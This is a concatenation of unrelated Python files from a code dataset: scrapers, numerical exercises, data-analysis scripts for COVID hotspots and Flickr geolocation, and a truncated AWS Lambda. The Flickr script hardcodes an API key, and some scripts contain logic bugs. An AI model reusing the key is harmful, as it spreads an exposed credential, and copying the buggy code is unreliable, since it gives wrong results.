test_loader","repo_name":"hkjit/cs520-ml-toolkits","sub_path":"image_classification/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20007010038","text":"from lxml import html\nimport requests\nimport csv\nfrom traceback import format_exc\nimport re\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom numpy import mean\n\nurl = \"https://www.ebay.com/sch/Portable-Audio-Headphones/15052/i.html?_udlo=50&_udhi=310&_mPrRngCbx=1&LH_Complete=1&_sop=13&_nkw=sony+wh-1000xm2&_ipg=200&rt=nc\"\nbrand = \"sony wh-1000xm2\"\nregex = re.compile(\"[0-9.]+\")\n\n\ndef parse(url):\n scraped_products = []\n for i in range(1, 4):\n try:\n # url = 'http://www.ebay.com/sch/i.html?_nkw={0}&_sacat=0'.format(brand)\n url += \"&_pgn={}\".format(str(i))\n print(\"Retrieving {}\".format(url))\n response = requests.get(url)\n print(\"Parsing page\")\n parser = html.fromstring(response.text)\n product_listings = parser.xpath('//li[contains(@class,\"lvresult\")]')\n raw_result_count = parser.xpath(\"//span[@class='rcnt']//text()\")\n result_count = ''.join(raw_result_count).strip()\n print(\"Found {0} results for {1}\".format(result_count, brand))\n\n for product in product_listings:\n # // shortcuts to specific class\n # use //header[@class=\"class\"]\n # or //header[contains(@class, 'class')]\n # first period dot limits to nth (target) instance\n raw_url = product.xpath(\"//a[@class='vip']/@href\")\n raw_title = product.xpath(\".//a[@class='vip']/text()\")\n raw_status = product.xpath(\".//div[@class='lvsubtitle']/text()\")\n raw_date = product.xpath(\".//span[@class='tme']/span/text()\")\n raw_price = product.xpath(\".//li[@class='lvprice prc']/span/text()\")\n raw_shipping = product.xpath(\".//span[@class='ship']/span/text()\")\n raw_shipping = product.xpath(\".//span[@class='fee']/text()\")\n\n title = ' '.join(' '.join(raw_title).split())\n status = ' '.join(' '.join(raw_status).split())\n price = ' '.join(' '.join(raw_price).split())\n # skip item if it has no price\n if len(price) < 2:\n continue\n price = float(price.strip('$'))\n\n shipping = ' '.join(' '.join(raw_shipping).split())\n if len(shipping) > 0:\n shipping = float(str(re.findall(regex, shipping)[0]))\n else:\n shipping = 0.0\n\n data = {\n 'url': raw_url[0],\n 'title': title,\n 'status': status,\n 'date': raw_date,\n 'price': price,\n 'shipping': shipping,\n 'total_price': price + shipping\n }\n scraped_products.append(data)\n except Exception as e:\n print(format_exc(e))\n return scraped_products\n\n\nscrape_list = parse(url)\nprint(\"\\n{}\\n\".format(scrape_list[7]))\n\nstatus_list = [\"Brand New\", \"Pre-Owned\"]\nstatus_dict = {}\n\nfor status in status_list:\n status_n_list = []\n for data in scrape_list:\n if data[\"status\"] == status:\n status_n_list.append(data[\"total_price\"])\n status_dict[status] = status_n_list\n print(\"\\n{} Average: {:.2f}\".format(status, mean(status_n_list)))\n\nfor subdict in status_dict:\n # print(subdict)\n price_list = status_dict[subdict]\n plt.figure(subdict)\n plt.hist(price_list)\nplt.show()\n\nwith open('{}-ebay-scraped-data.csv'.format(brand), 'w', encoding='utf-8') as csvfile:\n fieldnames = [\"date\", \"title\", \"status\", \"total_price\", \"price\", \"shipping\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, extrasaction='ignore',\n quoting=csv.QUOTE_ALL, lineterminator='\\n')\n writer.writeheader()\n for data in scrape_list:\n writer.writerow(data)\n","repo_name":"gnomieowns/ebay-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71332751112","text":"#구간합\narr = [0, 1, 2, 3, 4]\nN = len(arr)\n\nfor split_1 in range(1, N-1): #N-2까지 갈 수 있음?\n sum_sec1 = 0\n for num1 in range(0,split_1):\n sum_sec1 += arr[num1]\n sum_sec2 = 0\n for num_2 in range(num1 +1, N-1):\n sum_sec2 += arr[num_2]\n sum_sec3 = 0\n for num_3 in range(num_2 + 1, N):\n sum_sec3 += arr[num_3]\n sum_lst = [sum_sec1, sum_sec2, sum_sec3]\n print(sum_lst)\n\n","repo_name":"S4lTYD0G/TIL","sub_path":"0825/arr_test.py","file_name":"arr_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11918519053","text":"import math\n\n# Checks if Gauss-Seidel method is applicable\ndef ValidatesMatrix(A):\n coefficient = []\n for i in range(len(A)):\n b = 0\n for j in range(len(A)):\n if (i != j and i == 0) or i < j:\n b += A[i][j]\n elif i != j and i != 0:\n b += A[i][j]*coefficient[j]\n b /= A[i][i]\n coefficient.append(b)\n if max(coefficient) > 1:\n print('Gauss-Seidel method is not applicable!')\n return 0\n else:\n return 1\n\n# Finds the highest difference between current and previous solution\n\n\ndef difference(previous, current):\n difference = []\n for i in range(len(previous)):\n Diff = abs(current[i] - previous[i])\n difference.append(Diff)\n return max(difference)\n\n\ndef GaussSeidel(A, B, current_solutions, number_of_iterations, error):\n if ValidatesMatrix(A):\n for i in range(number_of_iterations):\n previous = []\n for xn in current_solutions:\n previous.append(xn)\n\n for j in range(len(A)):\n x = B[j]\n for k in range(len(A)):\n if j != k:\n x -= A[j][k]*current_solutions[k]\n x /= A[j][j]\n current_solutions[j] = x\n\n print(\"Iteration\", i+1, \"-\", end=\"\")\n resp = \"\"\n for solution in current_solutions:\n resp += ' ' + str(solution)\n print(resp)\n\n # Checks if difference has reached acceptable precision\n if difference(previous, current_solutions) < error:\n print(\"Max precision reached!\")\n break\n\n\n# Example\nA = [\n [12, 3, -5],\n [1, 5, 3],\n [3, 7, 13]\n]\nB = [1, 28, 76]\n\ninitial_guess = [1, 0, 1]\nnumber_of_iterations = 20\nerror = 0.00000001\n\n# Execution\nprint(\"----- Gauss-Seidel Method-----\")\nGaussSeidel(A, B, initial_guess, number_of_iterations, error)\n","repo_name":"luamz/numerical-methods","sub_path":"gauss-seidel.py","file_name":"gauss-seidel.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70962216072","text":"def string_to_ascii(value):\n \"\"\"\n Not the best method name, but you can copy the value from a key in Wireshark\n And use this method to get the same value to use for Scapy.\n :param value:\n :return:\n \"\"\"\n n = 2\n\n try:\n # Per two convert to hex\n value_per_two_characters = [value[i:i + n] for i in range(0, len(value), n)]\n # from hex convert to ascii\n ascii_values = [int(x, 16) for x in value_per_two_characters]\n\n # use ascii string\n converted_ascii_values = [chr(x) for x in ascii_values]\n\n # join to one string\n output = \"\".join(converted_ascii_values)\n return output\n except Exception:\n return \"\"\n","repo_name":"aredev/quic-scapy","sub_path":"util/string_to_ascii.py","file_name":"string_to_ascii.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"74500079750","text":"import sys\n'''\nSection 1: Collect customer input\n'''\n#Prompt the user for rentalCode (B)udget, (D)aily, or (W)eekly rental?\n#Example of using variable for an input string value.\nrentalCode = input (\"(B)udget, (D)aily, or (W)eekly rental?\\n\")\n\n#Used a branch to determine whether the rental period is days rented or weeks rented.\n#Example of using a branch.\nif rentalCode == 'B' or rentalCode == 'D':\n daysRented = int(input(\"Number of Days Rented:\\n\"))\nelse:\n weeksRented = int(input(\"Number of Weeks Rented:\\n\"))\nprint (rentalCode )\nif rentalCode == 'B' or rentalCode == 'D':\n print (daysRented)\nelse:\n print (weeksRented)\n\n#Assigned budget_Charge, daily_Charge, and weekly_Charge to a numerical value.\n#Example of assigning variables with numerical values.\nbudget_Charge = 40.00\ndaily_Charge = 60.00\nweekly_Charge = 190.00\n\n#Example of using a branch.\n#Example of changing a variable baseCharge with a math operator *.\nif rentalCode == 'B':\n baseCharge= daysRented * 40.00\nelif rentalCode == 'D':\n baseCharge=daysRented * 60.00\nelif rentalCode == 'W':\n baseCharge=weeksRented * 190.00\n#Printed the baseCharge value.\nprint (\"%.2f\" % (baseCharge))\n#Used a branch to modify variables with the * operator depending on the rental period.\n#Example of using a conditional statement to change the value of the baseCharge variable.\n\n#Assinged odoStart and odoEnd to an input string value. \nodoStart = input (\"Starting Odometer Reading:\\n\")\nodoEnd = input (\"Ending Odometer Reading:\\n\")\n\n#Assigned variable totalMiles to integer values of odoEnd minus odoStart.\n#For finding the total amount of miles.\ntotalMiles = int(odoEnd) - int(odoStart)\n\n#Pinted each value odoStart, odoEnd, and totalMiles.\nprint (odoStart)\nprint (odoEnd)\nprint (totalMiles)\n\n#Set mileCharge to total miles *.25: the extraMiles charge\n#Used to find extra cost of extraMiles\nmileCharge = totalMiles *.25\n\n#Calculated averagedailymiles to use for extra miles.\naveragedailymiles = int(totalMiles)/ int(daysRented)\n\n#Used a conditional branch statement to determine the extra cost for totalMiles. \n#Used for days rented.\nif rentalCode == 'B':\n mileCharge = 0.25 * totalMiles\nif rentalCode == \"D\":\n if averagedailymiles <= 100:\n totalMiles = 0\n elif averagedailymiles > 100:\n extraMiles = averagedailymiles - 100\n mileCharge = .25 * extraMiles\n\n#Used for weeks rented.\nif rentalCode == \"W\" and averagedailymiles > 900:\n mileCharge = daysRented * 100\nelif rentalCode == \"W\" and averagedailymiles <= 900:\n mileCharge = 0\n#Printed mileCharge value.\nprint (\"%.2f\" %(mileCharge))\n\n#Found the amount due by adding the base charge with the mile charge. \namtDue = float(baseCharge) +float(mileCharge)\n\n#Printed the rental summary which included the string variables and their values.\nprint ('Rental Summary')\nprint ('Rental Code:' +str(rentalCode))\nprint ('Rental Period:' +str(daysRented))\nprint ('Starting Odometer:' +str(odoStart))\nprint ('Ending Odometer:' +str(odoEnd))\nprint ('Miles Driven:' +str(totalMiles))\nprint ('Amount Due:' +'$' +'%.2f' %(amtDue))","repo_name":"HamirA2/Projects","sub_path":"rental_car.py","file_name":"rental_car.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38421268028","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @FileName :002_urllib的一个类型和六个方法.py\n# @Time :2023/2/26 22:45\n# @Author :周万宁\n\n\nif __name__ == \"__main__\":\n run_code = 0\n\nimport urllib.request\n\n\nurl = 'http://www.baidu.com'\n\n# 模拟浏览器向服务器发送请求\nresponse = urllib.request.urlopen(url)\n\n# 一个类型和六个方法\n# response 是 HTTPResponse的类型\n# print(type(response)) # \n\n# 按照一字节一字节的去读\n# content = response.read()\n# print(content)\n\n# 返回多少歌字节\n# content = response.read(5)\n# print(content)\n\n# 读取一行\n# content = response.readline()\n# print(content)\n\n# 返回状态码 如果是200 那么就证明我们的逻辑没有错\n# print(response.getcode())\n\n# 返回的是url地址\n# print(response.geturl())\n\n# 获取的是一些状态信息,\nprint(response.getheaders())\n\n# 一个类型 HTTPResponse\n# 六个方法 read readline readlines getcode geturl getheaders\n\n","repo_name":"WanNing-Zhou/newpyProject","sub_path":"python爬虫/002_urllib的一个类型和六个方法.py","file_name":"002_urllib的一个类型和六个方法.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19978940068","text":"import matplotlib.pyplot as plt\nimport os\nfrom numpy import genfromtxt\nimport scipy.io\n\nmat = scipy.io.loadmat('Ca_Mg_Na_js_distance_cond_old.mat')\n\njs_distance_matrix = mat['js_cell']\n\ntry: \n os.mkdir('Js_distances_matrix_image')\nexcept OSError as error: \n print(error)\n\n\nconditions = range(65, 65+9)\nfor i in conditions:\n\tjs_matrix = js_distance_matrix[i-65][0]\n\n\tfig1, ax1 = plt.subplots(figsize=(10,5))\n\tc = ax1.pcolor(js_matrix,cmap=\"Blues\")\n\tax1.set_ylim(ax1.get_ylim()[::-1])\n\n\tplt.title(\"Jensen-Shanon distance between nanochromatography images under condition \" + chr(i))\n\n\tax1.xaxis.set_ticks_position('top')\n\tax1.xaxis.set_label_position('top')\n\n\tticks = list(range(0, 76, 15))\n\tax1.set_xticks(ticks)\n\tticklabels = []\n\tfor ele in ticks:\n\t\tticklabels.append('Img ' + str(ele))\n\n\tax1.set_xticklabels(ticklabels)\n\n\tax1.set_yticks(ticks)\n\tax1.set_yticklabels(ticklabels)\n\n\tax1.set_xlabel('Water sample nanochromatography images')\n\tax1.set_ylabel('Water sample nanochromatography images')\n\tax1.set_aspect('equal')\n\tplt.colorbar(c,ax=ax1)\n\tfilename = 'Js_distances_matrix_image/' + chr(i) + '_js_Ca_Mg_Na_distance.png'\n\n\tplt.savefig(filename, bbox_inches='tight', dpi = 600)","repo_name":"xiaoyanLi629/coffee-ring-effect-method-optimization","sub_path":"Nanochromatography_cropped/Feature analysis/7_EDS_element_distribution_distance_analysis/js_distance_plot.py","file_name":"js_distance_plot.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38163622416","text":"import urllib\nimport json\n\n# Reads the places metadata from YFCC100M\n# Selects only the images with places metadata (48M)\n# Use flickr API to get the GPS coordinates of the towns.\n# Stores the image and location information in a txt file in the following format:\n# id;[tag1,tag2,...];country;town;latitude;longitude;url\n\n\nout_file = open(\"../../../ssd2/YFCC100M/anns_geo_gombru.txt\",'w')\n\nkey = \"71542c171848da257b3caa214f7ed00f\"\n\nprint(\"Getting places metadata\")\nplaces_file = open(\"../../../ssd2/YFCC100M/yfcc100m_places\")\nplaces_metadata = {}\nnum_countries = 0\nnum_towns = 0\n\ngeo_info = {}\n\nc = 0\nfor line in places_file:\n c+=1\n if c%200000 == 0: print(c)\n # if c == 10: break\n metadata = line.split(',')\n if len(metadata) < 2:\n continue # No geolocation info\n country = \"\"\n town = \"\"\n town_id = 0\n\n id = int(metadata[0].split('\\t')[0])\n metadata[0] = metadata[0].split('\\t')[1]\n for field in metadata:\n if \"Country\" in field:\n country = field.split(':')[1]\n country_id = int(field.split(':')[0])\n elif \"Town\" in field:\n town = field.split(':')[1]\n town_id = int(field.split(':')[0])\n\n if country != \"\": num_countries+=1\n if town != \"\": num_towns+=1\n\n if town_id == 0: continue\n\n # Query GPS coords to Flickr\n if town_id not in geo_info:\n try:\n print(places_metadata[id]['town'])\n query_api_url = \"https://api.flickr.com/services/rest/?method=flickr.places.getInfo&api_key=\"+key+\"&woe_id=\"+str(town_id)+\"&format=json&nojsoncallback=1\"\n response = urllib.urlopen(query_api_url)\n data = json.loads(response.read())\n latitude = float(data['place']['latitude'])\n longitude = float(data['place']['longitude'])\n geo_info[town_id] = {}\n geo_info[town_id]['lat'] = str(latitude)\n geo_info[town_id]['lon'] = str(longitude)\n except:\n print(\"Error getting geo info for town. Skipping sample\")\n continue\n\n # Has geolocation info\n places_metadata[id] = {}\n places_metadata[id]['town'] = town.replace(';',',')\n places_metadata[id]['town_id'] = town_id\n places_metadata[id]['country'] = country.replace(';',',')\n\n\nplaces_file.close()\n\nprint(\"Number of elements with geolocation found: \" + str(len(places_metadata)))\nprint(\"Number of elements with country found: \" + str(num_countries))\nprint(\"Number of elements with town found: \" + str(num_towns))\n\n\nprint(\"Getting images metadata\")\ndataset_file = open(\"../../../ssd2/YFCC100M/yfcc100m_dataset\")\nselected=0\n\nc = 0\nfor line in dataset_file:\n c+=1\n if c%2000000 == 0: print(c)\n # if c == 100000: break\n metadata = line.split('\\t')\n # print(metadata)\n id = int(metadata[1])\n if id not in places_metadata:\n continue # No geolocation info\n type = metadata[-2]\n if type != 'jpg' and type != 'jpeg' and type != 'png':\n continue # Is video\n url = metadata[-9].replace(';',',').replace('\\n', ' ').replace('\\r', '')\n tags = metadata[10].replace(';',',')\n if len(tags) < 3: continue # No tags\n\n # Image selected: Has geolocation info and tags\n selected+=1\n out_line = str(id) + ';' + tags + ';' + places_metadata[id]['country'] + ';' + places_metadata[id]['town'] + ';' + geo_info[town_id]['lat'] + ';'+ geo_info[town_id]['lon'] + ';' + url + '\\n'\n # print(out_line)\n out_file.write(out_line)\n\nprint(\"Selected number of images: \" + str(selected))\n\nout_file.close()\n\nprint(\"DONE\")","repo_name":"gombru/geoSemantics","sub_path":"dataset_code/build_anns_geolocation_old_bugged.py","file_name":"build_anns_geolocation_old_bugged.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16711076856","text":"import pandas as pd\nimport urllib, json\nimport csv\nimport datetime\nimport statistics \nimport collections\n\n#get weekly cases\n\nfields=['districtid','weekid','cases']\nweekdata=pd.read_csv('cases-week.csv',usecols=fields)\n\n\ncaselist=[]\nweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=int(weekdata.loc[(weekdata['weekid']==weekid) & (weekdata['districtid']==int(i)) ]['cases'])\n caselist.append(cases)\n \n weekdict[i]=caselist\n caselist=[]\n\n#get neibor values\n\nfields=['districtid','weekid','neighbormean','neighborstdev']\nneighbordata=pd.read_csv('neighbor-week.csv',usecols=fields)\n\n\n#neigbour mean\nnmeanlist=[]\nnmeanweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(neighbordata.loc[(neighbordata['weekid']==weekid) & (neighbordata['districtid']==int(i)) ]['neighbormean'])\n nmeanlist.append(cases)\n \n nmeanweekdict[i]=nmeanlist\n nmeanlist=[]\n\n\n\n#neigbor std\nnstdlist=[]\nnstdweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(neighbordata.loc[(neighbordata['weekid']==weekid) & (neighbordata['districtid']==int(i)) ]['neighborstdev'])\n nstdlist.append(cases)\n \n nstdweekdict[i]=nstdlist\n nstdlist=[]\n\n#get state values\n\nfields=['districtid','weekid','statemean','statestdev']\nstatedata=pd.read_csv('state-week.csv',usecols=fields)\n\n\n#state mean\nsmeanlist=[]\nsmeanweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(statedata.loc[(statedata['weekid']==weekid) & (statedata['districtid']==int(i)) ]['statemean'])\n smeanlist.append(cases)\n \n smeanweekdict[i]=smeanlist\n smeanlist=[]\n\n\n\n#state std\nsstdlist=[]\nsstdweekdict={}\nfor i in range(101,728):\n for weekid in range(1,26):\n cases=float(statedata.loc[(statedata['weekid']==weekid) & (statedata['districtid']==int(i)) ]['statestdev'])\n sstdlist.append(cases)\n \n sstdweekdict[i]=sstdlist\n sstdlist=[]\n\n#actual logic\n\n#creatin zscore csv\nweekdict = collections.OrderedDict(sorted(weekdict.items()))\nnmeanweekdict = collections.OrderedDict(sorted(nmeanweekdict.items()))\nnstdweekdict = collections.OrderedDict(sorted(nstdweekdict.items()))\nsmeanweekdict = collections.OrderedDict(sorted(smeanweekdict.items()))\nsstdweekdict = collections.OrderedDict(sorted(sstdweekdict.items()))\n\n\n\n#len(sstdweekdict[101])\n\nnhspwk=dict()\nncspwk=dict()\nshspwk=dict()\nscspwk=dict()\nfor (k,wkc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(weekdict.items(),nmeanweekdict.items(),nstdweekdict.items(),smeanweekdict.items(),sstdweekdict.items()):\n for weekid in range(25):\n if wkc[weekid]>(nm[weekid]+ns[weekid]):\n nhspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]<(nm[weekid]-ns[weekid]):\n ncspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]>(sm[weekid]+ss[weekid]):\n shspwk.setdefault(weekid,[]).append(k)\n if wkc[weekid]<(sm[weekid]-ss[weekid]):\n scspwk.setdefault(weekid,[]).append(k)\n\n#write to csv file\n\nwith open('method-spot-week.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['weekid','method','spot','districtid'])\n\n for wkid in range(25):\n if wkid in nhspwk.keys():\n for v in nhspwk[wkid]:\n csv_writer.writerow([wkid+1,'neighborhood','hot',v])\n if wkid in ncspwk.keys():\n for v1 in ncspwk[wkid]:\n csv_writer.writerow([wkid+1,'neighborhood','cold',v1])\n if wkid in shspwk.keys():\n for v2 in shspwk[wkid]:\n csv_writer.writerow([wkid+1,'state','hot',v2])\n if wkid in scspwk.keys():\n for v3 in scspwk[wkid]:\n csv_writer.writerow([wkid+1,'state','cold',v3])\n\n\n\n\n\n\n\n#month\nfields=['districtid','monthid','cases']\nmonthdata=pd.read_csv('cases-month.csv',usecols=fields)\n\n\nmcaselist=[]\nmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n mcases=int(monthdata.loc[(monthdata['monthid']==monthid) & (monthdata['districtid']==int(i)) ]['cases'])\n mcaselist.append(mcases)\n \n monthdict[i]=mcaselist\n mcaselist=[]\n\nfields=['districtid','monthid','neighbormean','neighborstdev']\nmneighbordata=pd.read_csv('neighbor-month.csv',usecols=fields)\n\n\n#neigbour mean\nnmmeanlist=[]\nnmmeanmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n nmcases=float(mneighbordata.loc[(mneighbordata['monthid']==monthid) & (mneighbordata['districtid']==int(i)) ]['neighbormean'])\n nmmeanlist.append(nmcases)\n \n nmmeanmonthdict[i]=nmmeanlist\n nmmeanlist=[]\n\n#neigbor std\nnmstdlist=[]\nnmstdmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n nscases=float(mneighbordata.loc[(mneighbordata['monthid']==monthid) & (mneighbordata['districtid']==int(i)) ]['neighborstdev'])\n nmstdlist.append(nscases)\n \n nmstdmonthdict[i]=nmstdlist\n nmstdlist=[]\n\nfields=['districtid','monthid','statemean','statestdev']\nmstatedata=pd.read_csv('state-month.csv',usecols=fields)\n\n\n#state mean\nsmmeanlist=[]\nsmmeanmonthdict={}\nfor i in range(101,728):\n for monthid in range(1,8):\n smcases=float(mstatedata.loc[(mstatedata['monthid']==monthid) & (mstatedata['districtid']==int(i)) ]['statemean'])\n smmeanlist.append(smcases)\n \n smmeanmonthdict[i]=smmeanlist\n smmeanlist=[]\n\n#state std\nsmstdlist=[]\nsmstdmonthdict={}\nfor i in range(101,728):\n for month in range(1,8):\n smcases=float(mstatedata.loc[(mstatedata['monthid']==monthid) & (mstatedata['districtid']==int(i)) ]['statestdev'])\n smstdlist.append(smcases)\n \n smstdmonthdict[i]=smstdlist\n smstdlist=[]\n\n#creatin zscore csv\nmonthdict = collections.OrderedDict(sorted(monthdict.items()))\nnmmeanmonthdict = collections.OrderedDict(sorted(nmmeanmonthdict.items()))\nnmstdmonthdict = collections.OrderedDict(sorted(nmstdmonthdict.items()))\nsmmeanmonthdict = collections.OrderedDict(sorted(smmeanmonthdict.items()))\nsmstdmonthdict = collections.OrderedDict(sorted(smstdmonthdict.items()))\n\n\n\nnhspmn=dict()\nncspmn=dict()\nshspmn=dict()\nscspmn=dict()\nfor (k,mnc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(monthdict.items(),nmmeanmonthdict.items(),nmstdmonthdict.items(),smmeanmonthdict.items(),smstdmonthdict.items()):\n for monthid in range(7):\n if mnc[monthid]>(nm[monthid]+ns[monthid]):\n nhspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]<(nm[monthid]-ns[monthid]):\n ncspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]>(sm[monthid]+ss[monthid]):\n shspmn.setdefault(monthid,[]).append(k)\n if mnc[monthid]<(sm[monthid]-ss[monthid]):\n scspmn.setdefault(monthid,[]).append(k)\n\nwith open('method-spot-month.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['monthid','method','spot','districtid'])\n\n for mnid in range(8):\n if mnid in nhspmn.keys():\n for v in nhspmn[mnid]:\n csv_writer.writerow([mnid+1,'neighborhood','hot',v])\n if mnid in ncspmn.keys():\n for v1 in ncspmn[mnid]:\n csv_writer.writerow([mnid+1,'neighborhood','cold',v1])\n if mnid in shspmn.keys():\n for v2 in shspmn[mnid]:\n csv_writer.writerow([mnid+1,'state','hot',v2])\n if mnid in scspmn.keys():\n for v3 in scspmn[mnid]:\n csv_writer.writerow([mnid+1,'state','cold',v3])\n\n\n\n#overall\nfields=['districtid','overallid','cases']\noveralldata=pd.read_csv('cases-overall.csv',usecols=fields)\n\n\nocaselist=[]\noveralldict={}\nfor i in range(101,728):\n \n ocases=int(overalldata.loc[(overalldata['overallid']==1) & (overalldata['districtid']==int(i)) ]['cases'])\n ocaselist.append(ocases)\n \n overalldict[i]=ocaselist\n ocaselist=[]\n\nfields=['districtid','overallid','neighbormean','neighborstdev']\noneighbordata=pd.read_csv('neighbor-overall.csv',usecols=fields)\n\n\n#neigbour mean\nnomeanlist=[]\nnomeanoveralldict={}\nfor i in range(101,728):\n \n nocases=float(oneighbordata.loc[(oneighbordata['overallid']==1) & (oneighbordata['districtid']==int(i)) ]['neighbormean'])\n nomeanlist.append(nocases)\n \n nomeanoveralldict[i]=nomeanlist\n nomeanlist=[]\n\n#neigbor std\nnostdlist=[]\nnostdoveralldict={}\nfor i in range(101,728):\n \n noscases=float(oneighbordata.loc[(oneighbordata['overallid']==1) & (oneighbordata['districtid']==int(i)) ]['neighborstdev'])\n nostdlist.append(noscases)\n \n nostdoveralldict[i]=nostdlist\n nostdlist=[]\n\nfields=['districtid','overallid','statemean','statestdev']\nostatedata=pd.read_csv('state-overall.csv',usecols=fields)\n\n\n#state mean\nsomeanlist=[]\nsomeanoveralldict={}\nfor i in range(101,728):\n \n socases=float(ostatedata.loc[(ostatedata['overallid']==1) & (ostatedata['districtid']==int(i)) ]['statemean'])\n someanlist.append(smcases)\n \n someanoveralldict[i]=someanlist\n someanlist=[]\n\n#state std\nsostdlist=[]\nsostdoveralldict={}\nfor i in range(101,728):\n \n socases=float(ostatedata.loc[(ostatedata['overallid']==1) & (ostatedata['districtid']==int(i)) ]['statestdev'])\n sostdlist.append(socases)\n \n sostdoveralldict[i]=sostdlist\n sostdlist=[]\n\n#creatin zscore csv\noveralldict = collections.OrderedDict(sorted(overalldict.items()))\nnomeanoveralldict = collections.OrderedDict(sorted(nomeanoveralldict.items()))\nnostdoveralldict = collections.OrderedDict(sorted(nostdoveralldict.items()))\nsomeanoveralldict = collections.OrderedDict(sorted(someanoveralldict.items()))\nsostdoveralldict = collections.OrderedDict(sorted(sostdoveralldict.items()))\n\n\n\nnhspo=dict()\nncspo=dict()\nshspo=dict()\nscspo=dict()\nfor (k,oc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(overalldict.items(),nomeanoveralldict.items(),nostdoveralldict.items(),someanoveralldict.items(),sostdoveralldict.items()):\n for overallid in range(1):\n if oc[overallid]>(nm[overallid]+ns[overallid]):\n nhspo.setdefault(overallid,[]).append(k)\n if oc[overallid]<(nm[overallid]-ns[overallid]):\n ncspo.setdefault(overallid,[]).append(k)\n if oc[overallid]>(sm[overallid]+ss[overallid]):\n shspo.setdefault(overallid,[]).append(k)\n if oc[overallid]<(sm[overallid]-ss[overallid]):\n scspo.setdefault(overallid,[]).append(k)\n\nwith open('method-spot-overall.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['overallid','method','spot','districtid'])\n\n for oid in range(1):\n if oid in nhspo.keys():\n for v in nhspo[oid]:\n csv_writer.writerow([oid+1,'neighborhood','hot',v])\n if oid in ncspo.keys():\n for v1 in ncspo[oid]:\n csv_writer.writerow([oid+1,'neighborhood','cold',v1])\n if oid in shspo.keys():\n for v2 in shspo[oid]:\n csv_writer.writerow([oid+1,'state','hot',v2])\n if oid in scspo.keys():\n for v3 in scspo[oid]:\n csv_writer.writerow([oid+1,'state','cold',v3])\n\n\n","repo_name":"leoevenss/Covid-Data-Analysis","sub_path":"method-spot-generator.py","file_name":"method-spot-generator.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5768947633","text":"import traceback\nimport json\nimport requests\nimport os\n\nfrom ssm_util import fetch_ssm_params\nfrom customlist_data_builder import CustomlistItemDataBuilder\nfrom constants import IMAGE_PATH\nfrom builder_client import BuilderClient\n\n\ndef add_employee_to_guide(event, context):\n \"\"\"\n This lambda adds a new employee\n to the guide after they are added\n in Zenefits\n \"\"\"\n\n try:\n # Fetch the Builder API key, the guide ID of the guide where the content\n # is published, and the custom list ID that the items are associated with\n api_key, guide_and_list_ids, zenefits_app_key = fetch_ssm_params()\n\n # Initialize a Session\n builder_client = BuilderClient(api_key)\n\n for guide_id, employee_customlist_id in guide_and_list_ids:\n # Use the lambda event data to build a CustomListItem\n employee_data = event[\"data\"]\n customlist_data_builder = CustomlistItemDataBuilder(guide_id, zenefits_app_key)\n customlist_data = customlist_data_builder.build(employee_data)\n\n # Create a new CustomListItem in Builder\n url = f\"https://builder.guidebook.com/open-api/v1/custom-list-items/?guide={guide_id}&custom_lists={employee_customlist_id}\"\n photo_available = False\n if employee_data.get('photo_url'):\n img_response = requests.get(employee_data['photo_url'])\n photo_available = True if img_response.status_code == 200 else False\n\n if photo_available:\n with open(IMAGE_PATH, 'wb') as handler:\n handler.write(img_response.content)\n with open(IMAGE_PATH, 'rb') as handler:\n response = builder_client.post(url, customlist_data, {\"thumbnail\": handler})\n os.remove(IMAGE_PATH)\n else:\n response = builder_client.post(url, customlist_data)\n\n # Create a new CustomListItemRelation in Builder\n relations_data = {\n \"custom_list\": employee_customlist_id,\n \"custom_list_item\": response.json()[\"id\"],\n }\n url = \"https://builder.guidebook.com/open-api/v1/custom-list-item-relations/\"\n builder_client.post(url, data=relations_data)\n\n # Publish the changes\n response = 